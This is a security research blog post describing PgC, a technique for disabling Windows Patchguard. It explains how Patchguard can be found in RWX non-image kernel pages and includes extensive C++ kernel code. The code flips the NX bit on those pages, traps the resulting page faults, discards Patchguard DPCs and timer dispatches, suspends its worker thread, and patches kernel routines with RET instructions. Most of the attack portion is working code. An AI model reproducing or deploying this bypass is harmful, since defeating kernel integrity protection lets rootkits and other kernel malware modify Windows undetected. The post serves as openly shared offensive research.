PgC: Garbage collecting Patchguard away

I have released another article about Patchguard almost 5 years ago, ByePg, which was about exception hooking in the kernel, but let’s be frank, it didn’t entirely get rid of Patchguard; in this article I will be discussing an entirely different approach to bypass Patchguard, PgC.

Now there already is plenty of great research on Patchguard, Tetrane even released a 61-page whitepaper on all the intricacies of Patchguard. What makes PgC different is that it does not actually depend on how Patchguard works, but the very obvious principles of memory management. The advantage of this approach is that it is not defeating a specific version of Patchguard, but rather the entire concept of it. I’ll admit I have been sitting on this for a while, but I think it is now time to share it with the world, after almost 7 years, during which I only had to change a single line of code to update it (Hi KiSwInterruptDispatch 👋).

¶ 0x0: A stark contrast

There is only one thing we need to know about Patchguard in order to come up with an idea to defeat it: it runs on non-image pages and it decrypts itself on the fly.

Just by knowing this you should see where this is going when you recall that the Windows kernel, like any other modern operating system, absolutely hates the idea of RWX memory in Ring 0! It is a security nightmare after all, and Microsoft will not sign your driver if you have RWX sections in it. A case of do as I say, not as I do, interesting!

¶ 0x1: System VA types

Before we start engineering a solution to attack this very contrast, there is one more thing we should know about our beloved OS: how it likes to keep its memory arranged. Let’s play a little game. Go ahead and launch Process Hacker, or any other tool that shows you the image base of a kernel driver and pick a (non-session) driver and check its image base. Does it start with something close to 0xfffff803?

Admittedly, this was not the best party trick, but the point of it all is that the kernel manages each “type” of memory in different PXIs (PML4/PML5 indices). You can get an idea of how this all works from looking at the enum _MI_SYSTEM_VA_TYPE, within the MiVisibleState there is a neat little array called SystemVaType, mapping the upper 256 PXIs to a specific type of memory. Meaning that when you allocate a page, it isn’t reaaaly random where it ends up even if it is somewhat randomized each boot.

To give you an idea of each region of memory, here’s a snippet of the enum:

 1namespace mi
 2{
 3    // [enum _MI_SYSTEM_VA_TYPE]
 4    //  Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
 5    //
 6    enum class system_va_type_t : int32_t       
 7    {                                           
 8        unused =                        0x0,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
 9        session_space =                 0x1,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
10        process_space =                 0x2,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
11        boot_loaded =                   0x3,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
12        pfn_database =                  0x4,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
13        non_paged_pool =                0x5,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
14        paged_pool =                    0x6,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
15        special_pool_paged =            0x7,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
16        system_cache =                  0x8,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
17        system_ptes =                   0x9,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
18        hal =                           0xa,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
19        formerly_session_global_space = 0xb,      // Windows 11
20        session_global_space =          0xb,      // Windows 10 v1607, Windows 10 v2004, Windows 10 v20H2
21        driver_images =                 0xc,      // Windows 10 v1607, Windows 10 v2004, Windows 11, Windows 10 v20H2
22        special_pool_non_paged =        0xd,      // Windows 10 v1607
23        system_ptes_large =             0xd,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
24        kernel_stacks =                 0xe,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
25        //maximum_type =                0xe,      // Windows 10 v1607
26        secure_non_paged_pool =         0xf,      // Windows 10 v2004, Windows 11, Windows 10 v20H2
27        //system_ptes_large =           0xf,      // Windows 10 v1607
28        kernel_shadow_stacks =          0x10,     // Windows 11
29        maximum_type =                  0x10,     // Windows 10 v2004, Windows 10 v20H2
30        kasan =                         0x11,     // Windows 11
31        //maximum_type =                0x12,     // Windows 11
32    };                                          
33};

What this means is that, if we exclude the pages that are used for actual kernel images, and filter for RWX memory, what we end up is a very small subset of allocations, most likely either Patchguard or some rootkit you sadly have on your system.

¶ 0x2: GC

Big corporation might not like the fact that you really have the same privileges as their OS on your own machine, but (for the next few years at least) you do. So let’s just do a little garbage collection of our own and mark these pages no-execute.

 1scheduler::call_ipi( [ & ] ( auto barrier ) {
 2	barrier->up();
 3
 4	// Determine the range we scan.
 5	//
 6	auto [range_min, range_max] = get_range( range_per_cpu );
 7
 8	// Iterate all top level page table entires in kernel address space.
 9	//
10	for ( size_t ipxe = 256; ipxe != 512; ipxe++ ) {
11		// If ignored region, skip.
12		//
13		if ( mem::get_pxi_flags( ipxe ) & ignored_pxi_flags )
14			continue;
15
16		auto rec = [ & ] <auto N> ( auto&& self, uint64_t va, const_tag<N>, size_t imin, size_t imax )
17		{
18			auto pte = mem::get_pte( va, N );
19
20			// Skip if not present.
21			//
22			if ( !pte->present )
23				return;
24			
25			// If we did not reach the bottom level:
26			//
27			if constexpr ( N != 0 ) {
28				// If directory:
29				//
30				if ( !pte->large_page ) {
31					// Iterate all pt entries:
32					//
33					for ( size_t ipte = imin; ipte != imax; ipte++ )
34						self( self, va | ( ipte << ( 12 + 9 * ( N - 1 ) ) ), const_tag<N - 1>{}, 0, 512 );
35					return;
36				}
37				// If large page, skip if too large to be considered.
38				//
39				else if constexpr ( N > 1 ) {
40					return;
41				}
42				// Fallthrough to page handling.
43			}
44
45			// Skip if not RWX.
46			//
47			if ( !pte->write || pte->execute_disable )
48				return;
49
50			// Skip if user-mode memory mapped to kernel.
51			//
52			if ( !is_kernel_va( mem::get_virtual_address( pte->page_frame_number << 12 ), true ) )
53				return;
54
55			// Disable execution.
56			//
57			atomic_bit_set( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
58		};
59		rec( rec, mem::make_cannonical( ipxe << ( mem::va_bits - 9 ) ), const_tag<mem::page_table_depth - 1>{}, range_min, range_max );
60	}
61
62	// Flush the TLB and return.
63	//
64	barrier->down();
65	ia32::flush_tlb();
66} );

This code more or less comes down to:

Launch an IPI since we don’t want to race with the rest of the OS.
Iterate all the kernel pages (indices 0x100 to 0x1ff).
Skip the ones that could not have Patchguard, I’d recommend skipping SessionSpace, ProcessSpace, DriverImages, PagedPool and most importantly the Self-referencing index unless you want to triple fault.
Skip the pages that are no-execute, write disabled or not present.
Go ahead and flip the NX bit.

If this all goes right, you will bluescreen in two to three minutes, which is when the Patchguard would have decrypted itself and tried to run. ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY Hurray?

¶ 0x3: Healing back our OS

We now need a hook on #PF. Remember, there is no Patchguard anymore so our job is very straight forward. You can switch the IDT and add your own page fault handler, inline hook MmAccessFault, whichever method you’d like, as long you do it quickly and right before our IPI.

The final step, even with zero prior knowledge on how Patchguard works is suprisingly simple. Just let it bluescreen a few times and look at the dump! You will notice that there is a few DPCs, all of which start with an XOR instruction and a worker at PASSIVE_LEVEL. The worker, we will suspend forever, and the DPC ones, well just return to whoever is calling without doing anything.

That was pretty much it. The entire source code comes down to essentially 200 lines and there is no more Patchguard.

  1static constexpr bool pgc_debug = is_debug_build() && true;
  2static constexpr bool pgc_disable_timer_dispatch = true;
  3static constexpr bool pgc_disable_dpc_dispatch =   true;
  4static constexpr bool pgc_disable_context_dpc =    true;
  5static constexpr auto ignored_pxi_flags = mem::va_image | mem::va_session | mem::va_process | mem::va_self_ref | mem::va_paged;
  6inline static bool is_va_ignored( any_ptr virtual_address ) { return mem::lookup_va_flags( virtual_address ) & ignored_pxi_flags; }
  7
  8// The ISR handling Kernel-mode NX faults:
  9bool on_knx_fault( void* virtual_address, nt::trapframe* tf ) {
 10	// If ignored region, skip.
 11	//
 12	if ( is_va_ignored( virtual_address ) )
 13		return false;
 14
 15	// Get IRQL, display details.
 16	//
 17	auto* stack = ( void** ) ( tf->rsp & ~7ull );
 18	irql_t irql = ia32::get_effective_irql( tf->rflags );
 19	if constexpr ( pgc_debug ) {
 20		log( "KNX Caught @ %p\n", tf->rip );
 21		log( "RSP:  %p\n", tf->rsp );
 22		log( "RAX:  %p\n", tf->rax );
 23		log( "RCX:  %p\n", tf->rcx );
 24		log( "RDX:  %p\n", tf->rdx );
 25		log( "RBX:  %p\n", tf->rbx );
 26		log( "RBP:  %p\n", tf->rbp );
 27		log( "R8:   %p\n", tf->r8 );
 28		log( "R9:   %p\n", tf->r9 );
 29		log( "R10:  %p\n", tf->r10 );
 30		log( "R11:  %p\n", tf->r11 );
 31		log( "IRQL: %d\n", irql );
 32		for ( uint64_t p = tf->rip; p < ( tf->rip + 32 ); ) {
 33			if ( !mem::is_address_valid( p ) || !mem::is_address_valid( p + 15 ) ) {
 34				break;
 35			}
 36			auto ins = xed::decode64( ( void* ) p );
 37			if ( !ins ) break;
 38			log( "%p: %s\n", p, ins->to_string() );
 39			p += ins->length();
 40		}
 41	}
 42
 43	// Dispatch level or IPI level PatchGuard components:
 44	//
 45	if ( irql >= DISPATCH_LEVEL ) {
 46		uint8_t* bytes = ( uint8_t* ) tf->rip;
 47
 48		// KiDpcDispatch/CmpAppendDllSection clone called from dummy DPCs, decrypts and calls into pg context.
 49		//
 50		if ( pgc_disable_context_dpc && !memcmp( bytes, "\x2E\x48\x31", 3 ) ) {
 51			if ( !mem::is_cannonical( tf->rdx ) ) {
 52				if ( tf->rcx == tf->rip ) {
 53					if constexpr ( pgc_debug )
 54						log( "Discarded CmpAppendDllSection DPC: %llx\n", tf->rip );
 55					tf->rip = *( uint64_t* ) tf->rsp;
 56					tf->rsp += 8;
 57					return true;
 58				}
 59			}
 60		} 
 61		else if ( pgc_disable_dpc_dispatch && !memcmp( bytes, "\x48\x31", 2 ) ) {
 62			if ( !mem::is_cannonical( tf->rdx ) ) {
 63				if ( ( tf->rip - 0x70 ) <= tf->rcx && tf->rcx <= ( tf->rip + 0x70 ) ) {
 64					if constexpr ( pgc_debug )
 65						log( "Discarded KiDpcDispatch DPC: %llx\n", tf->rip );
 66					tf->rip = *( uint64_t* ) tf->rsp;
 67					tf->rsp += 8;
 68					return true;
 69				}
 70			}
 71		}
 72
 73		// KiTimerDispatch clone called from KiExecuteAllDpcs, decrypts and calls into pg context.
 74		//
 75		if constexpr ( pgc_disable_timer_dispatch ) {
 76			for ( int i = 0; i < 0x20; i++ ) {
 77				// pushfq
 78				if ( bytes[ i + 0 ] == 0x48 && bytes[ i + 1 ] == 0x9C ) {
 79					for ( int j = i; j < 0x20; j++ ) {
 80						// sub rsp
 81						if ( bytes[ j + 0 ] == 0x48 && bytes[ j + 1 ] == 0x83 ) {
 82							if constexpr ( pgc_debug )
 83								log( "Discarded KiTimerDispatch: %llx\n", tf->rip );
 84							tf->rip = *( uint64_t* ) tf->rsp;
 85							tf->rsp += 8;
 86							return true;
 87						}
 88					}
 89				}
 90			}
 91		}
 92	} else if ( ke::get_eprocess() == ntpp::get_initial_system_process() ) {
 93		// Deferred work item?
 94		//
 95		uint64_t last_valid_vpn = 0;
 96		for ( int i = 0; i < 0x20; i++ ) {
 97			// Validate stack pointer.
 98			//
 99			auto* value_ptr = &stack[ i ];
100			if ( auto vpn = uint64_t( value_ptr ) >> 12; vpn != last_valid_vpn ) {
101				if ( !mem::is_address_valid( value_ptr ) ) {
102					break;
103				}
104				last_valid_vpn = vpn;
105			}
106
107			// Check if it matches the value we expected.
108			//
109			void* value = *value_ptr;
110			if ( value != &ke::delay_execution_thread && value != &ke::wait_for_multiple_objects && value != &ke::wait_for_single_object ) {
111				continue;
112			}
113
114			// Align stack
115			tf->rsp &= ~0xF;
116			// Set the arguments on stack
117			tf->rcx = ( uint64_t ) nt::mode_t::kernel_mode;
118			tf->rdx = false;
119			*( int64_t* ) ( tf->r8 = ( tf->rsp + 0x28 ) ) = -0x11F0231A4F3000;
120			// Simulate call [KeDelayExecutionThread]
121			tf->rsp -= 8;
122			*( uint64_t* ) tf->rsp = tf->rip;
123			tf->rip = ( uint64_t ) &ke::delay_execution_thread;
124		
125			// Lower IRQL and return.
126			//
127			if constexpr ( pgc_debug )
128				log( "Suspended PatchGuard worker thread: %llx\n", ntpp::get_client_id().unique_thread );
129			ia32::set_irql( APC_LEVEL );
130			tf->rflags.interrupt_enable_flag = true;
131			return true;
132		}
133	}
134
135	// False positive, fix NX and continue.
136	//
137	auto [pte, _] = mem::lookup_pte( virtual_address );
138	atomic_bit_reset( pte->flags, PT_ENTRY_64_EXECUTE_DISABLE_BIT );
139	return true;
140}
141
142// Initializes the patchguard bypass.
143//
144void init() {
145	// Fetch the number of processors and distribute the work.
146	//
147	static const uint16_t num_processors = ( uint16_t ) apic::number_of_processors();
148	static const uint16_t range_per_cpu = 512 / num_processors;
149	static constexpr auto get_range = [ ] ( uint16_t range_per_cpu ) -> std::pair<uint16_t, uint16_t> {
150		// [ idx*R, (idx+1)*R ]
151		uint16_t rmin = uint16_t( ia32::read_pcid() ) * range_per_cpu;
152		uint16_t rmax = rmin + range_per_cpu;
153		
154		// If last range, round to max.
155		if ( ( rmax + range_per_cpu ) >= 512 )
156			rmax = 512;
157		
158		return { rmin, rmax };
159	};
160	
161	// Add the patches and call the IPI.
162	//
163	if ( sdk::exists( ki::sw_interrupt_dispatch ) )
164		hook::patch( &ki::sw_interrupt_dispatch, { 0xC3 } );
165	if ( sdk::exists( ki::mca_deferred_recovery_service ) )
166		hook::patch( &ki::mca_deferred_recovery_service, { 0xC3 } );
167	scheduler::call_ipi( [ & ] ( auto barrier ) {
168		// .... See above
169	} );
170}

As it stands right now, the code base is not yet ready for release due to the vast amount of dependencies on bits and pieces of my libraries (C runtime, the hooking library, ISRs…), but I will try to release a standalone version of PgC in the near future. You can find some of the memory utilities used above at Github.

I hope you enjoyed this article and the trick even more. If you have any questions, feel free to ask them on the bird app or the comments below.

¶ 0x0: A stark contrast

¶ 0x1: System VA types

¶ 0x2: GC

¶ 0x3: Healing back our OS

Can Bölük

Related Articles

ByePg: Defeating Patchguard using Exception-hooking

Arbitrary Code Execution at Ring 0 using CVE-2018-8897

Making the Perfect Injector: Abusing Windows Address Sanitization and CoW